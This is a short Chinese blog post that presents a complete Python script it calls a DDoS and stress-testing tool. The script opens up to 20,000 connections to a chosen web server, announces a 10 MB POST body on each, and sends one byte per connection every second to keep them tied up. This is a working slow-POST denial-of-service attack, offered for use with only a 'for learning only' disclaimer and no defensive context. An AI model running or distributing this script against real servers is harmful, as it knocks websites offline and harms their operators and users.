Python ddos腳本/壓力測試

import sys
import struct
import socket
import time
import threading
#壓力測試,ddos工具
#----------------------------------
MAX_CONN = 20000
PORT = 80
HOST = "www.aaa.com" //網(wǎng)址/ip
PAGE = "/index.php"       //頁面地址
#----------------------------------
 
buf=("POST %s HTTP/1.1\r\n"
"Host: %s\r\n"
"Content-Length: 10000000\r\n"
"Cookie: dklkt_dos_test\r\n"
"\r\n" % (PAGE,HOST))
 
socks = []
 
def conn_thread():
    global socks
    for i in range(0,MAX_CONN):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.connect((HOST,PORT))
            s.send(buf)
            print "Send buf ok! conn=%d\n"%i
            socks.append(s)
        except Exception,e:
            print "Could not connect to server or send error:%s"%e
            time.sleep(10)
            #sys.exit(0)
#end def
 
def send_thread():
    global socks
    while True:
        for s in socks:
            try:
                s.send("f")
                #print "sendok!"
            except Exception,e:
                print "Send Exception:%s\n"%e
                socks.remove(s)
                s.close()
 
        time.sleep(1)
#end def
 
conn_th=threading.Thread(target=conn_thread,args=())
send_th=threading.Thread(target=send_thread,args=())
 
conn_th.start()
send_th.start()

內容轉載自網(wǎng)絡,請勿危害網(wǎng)絡,僅供學習使用。

?著作權歸作者所有,轉載或內容合作請聯(lián)系作者
【社區(qū)內容提示】社區(qū)部分內容疑似由AI輔助生成,瀏覽時請結合常識與多方信息審慎甄別。
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發(fā)布,文章內容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務。

相關閱讀更多精彩內容

友情鏈接更多精彩內容